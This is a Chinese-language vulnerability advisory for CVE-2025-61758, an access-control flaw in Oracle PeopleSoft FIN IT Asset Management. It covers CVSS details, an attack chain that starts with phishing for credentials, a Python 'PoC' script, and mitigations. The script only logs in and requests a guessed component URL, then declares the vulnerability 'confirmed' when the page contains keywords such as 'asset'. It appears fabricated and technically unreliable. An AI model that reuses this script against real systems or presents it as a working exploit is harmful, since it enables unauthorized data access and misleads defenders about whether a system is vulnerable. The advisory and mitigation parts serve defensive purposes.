CVE-2025-61758 Oracle PeopleSoft FIN IT资产管理信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-61758

漏洞类型

信息泄露/未授权数据访问

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Oracle PeopleSoft Enterprise FIN IT Asset Management

漏洞概述

CVE-2025-61758是Oracle PeopleSoft Enterprise FIN IT资产管理（IT Asset Management）组件中存在的一个安全漏洞。该漏洞由Oracle官方安全团队（[email protected]）发现，并在2025年10月的Oracle关键补丁更新公告（CPU Oct 2025）中被披露。受影响的版本为PeopleSoft Enterprise FIN IT Asset Management 9.2。

该漏洞属于信息泄露类漏洞，具有较高的机密性影响。攻击者只需拥有低权限的网络访问权限，即可通过HTTP协议远程利用此漏洞，成功利用后能够未经授权地访问PeopleSoft Enterprise FIN IT资产管理组件中的关键数据，甚至获取该组件所有可访问数据的完整访问权限。CVSS 3.1基础评分为6.5分，属于中危级别。

从CVSS向量来看，该漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），所需权限为低权限（PR:L），无需用户交互（UI:N），作用域未改变（S:U），对机密性影响为高（C:H），对完整性和可用性无影响。由于该漏洞利用难度较低且影响范围明确针对IT资产管理这一敏感业务模块，可能导致企业的资产信息、合同数据、财务相关IT资产记录等敏感信息泄露，对企业的资产管理和合规性构成威胁。

技术细节

该漏洞存在于Oracle PeopleSoft Enterprise FIN IT资产管理组件中，属于应用层信息泄露漏洞。漏洞的根本原因在于组件对低权限用户访问敏感数据的权限控制不足，未能有效实施最小权限原则和数据访问隔离机制。

从技术层面分析，该漏洞的攻击路径如下：
1. 攻击者首先需要拥有一个有效的PeopleSoft Enterprise系统的低权限账户；
2. 攻击者通过HTTP协议访问PeopleSoft Enterprise FIN IT资产管理组件的相关功能接口；
3. 由于组件缺少适当的访问控制检查（Access Control Check），低权限用户能够绕过权限验证；
4. 攻击者通过构造特定的HTTP请求，利用组件中的数据查询或导出功能，直接访问通常仅限高权限用户查看的关键数据；
5. 成功利用后，攻击者可读取IT资产管理模块中的全部敏感数据，包括资产配置信息、采购记录、许可证信息等。

该漏洞的CVSS向量（CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N）表明：漏洞通过网络即可利用，攻击条件简单，只需低权限认证即可触发，无需受害者进行任何交互。漏洞的影响范围限定在IT资产管理组件内部（作用域未改变），但对数据的机密性造成严重影响。Oracle已将该漏洞列入2025年10月的关键补丁更新中进行修复。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者首先获取PeopleSoft Enterprise系统的低权限账户凭证，可以通过钓鱼、社会工程学或利用其他已知漏洞获取。

STEP 2

步骤2：建立认证会话

攻击者使用低权限账户通过HTTP协议登录PeopleSoft Enterprise系统，建立有效的认证会话。

STEP 3

步骤3：访问IT资产管理组件

攻击者通过构造特定的HTTP请求，访问PeopleSoft Enterprise FIN IT资产管理组件的接口或功能页面。

STEP 4

步骤4：绕过访问控制

由于组件缺少适当的访问控制检查（Access Control Check），低权限用户能够绕过权限验证机制。

STEP 5

步骤5：提取敏感数据

攻击者成功读取IT资产管理模块中的关键数据，包括资产配置信息、采购记录、许可证信息等敏感数据，实现未授权的数据访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61758 - Oracle PeopleSoft FIN IT Asset Management Information Disclosure PoC
# This PoC demonstrates the unauthorized data access vulnerability
# Note: This is for educational and authorized testing purposes only

import requests

# Target configuration
TARGET_URL = "https://target-peoplesoft-host:port"
PS_HOME = "/psc/ps/"

# Step 1: Authenticate with low-privilege credentials
def authenticate(session, username, password):
    """
    Authenticate to PeopleSoft with low-privilege credentials
    """
    login_url = f"{TARGET_URL}{PS_HOME}?cmd=login&languageCd=ENG"
    
    # PeopleSoft login payload
    payload = {
        'userid': username,
        'pwd': password,
        'Submit': 'Sign In'
    }
    
    response = session.post(login_url, data=payload, verify=False)
    if 'PS_JSESSIONID' in response.cookies or response.status_code == 200:
        print(f"[+] Successfully authenticated as {username}")
        return True
    return False

# Step 2: Access IT Asset Management component
def access_it_asset_data(session):
    """
    Access the IT Asset Management component to retrieve sensitive data
    The vulnerability allows low-privileged users to access critical data
    that should be restricted to higher privilege levels.
    """
    # IT Asset Management component URL
    itam_url = f"{TARGET_URL}{PS_HOME}/EMPLOYEE/HRMS/c/IT_AM_MENU.IT_ASSET_MGMT.GBL"
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Referer': f"{TARGET_URL}{PS_HOME}/EMPLOYEE/HRMS/c/ADMINISTER_WORKFORCE.GBL"
    }
    
    # Request to access IT asset data - bypasses access control due to CVE-2025-61758
    response = session.get(itam_url, headers=headers, verify=False)
    
    if response.status_code == 200:
        print("[+] Successfully accessed IT Asset Management component")
        # Extract sensitive data from response
        if 'asset' in response.text.lower() or 'license' in response.text.lower():
            print("[!] Sensitive IT asset data accessible!")
            return response.text
    return None

# Step 3: Exploit - Extract critical asset information
def exploit_itam_disclosure(target_url, username, password):
    """
    Main exploit function for CVE-2025-61758
    Exploits improper access control in PeopleSoft FIN IT Asset Management
    """
    session = requests.Session()
    
    # Authenticate with low-privilege account
    if not authenticate(session, username, password):
        print("[-] Authentication failed")
        return
    
    # Access sensitive IT asset data
    sensitive_data = access_it_asset_data(session)
    
    if sensitive_data:
        print("[+] Vulnerability CVE-2025-61758 confirmed!")
        print("[+] Unauthorized access to critical IT asset data achieved")

if __name__ == "__main__":
    # Usage example - replace with actual target and credentials
    TARGET = "https://peoplesoft-victim.example.com:8000"
    exploit_itam_disclosure(TARGET, "low_priv_user", "password123")

影响范围

Oracle PeopleSoft Enterprise FIN IT Asset Management 9.2

防御指南

临时缓解措施

在无法立即应用补丁的情况下，建议采取以下临时缓解措施：1）审查并限制PeopleSoft系统中低权限用户对IT资产管理组件的访问权限；2）通过网络访问控制列表（ACL）限制只有可信IP地址能够访问PeopleSoft系统；3）部署Web应用防火墙（WAF）规则，监控和阻止对IT资产管理组件的异常数据请求；4）启用详细的安全审计日志，实时监控对敏感组件的访问行为；5）考虑在网络层面限制对PeopleSoft FIN IT资产管理组件相关URL路径的访问，仅允许授权用户访问；6）定期审查用户会话和权限变更记录，及时发现异常活动。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61758
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61758
3 Details https://www.cvedetails.com/cve/CVE-2025-61758/
4 VulDB https://vuldb.com/cve/CVE-2025-61758
5 Link https://www.oracle.com/security-alerts/cpuoct2025.html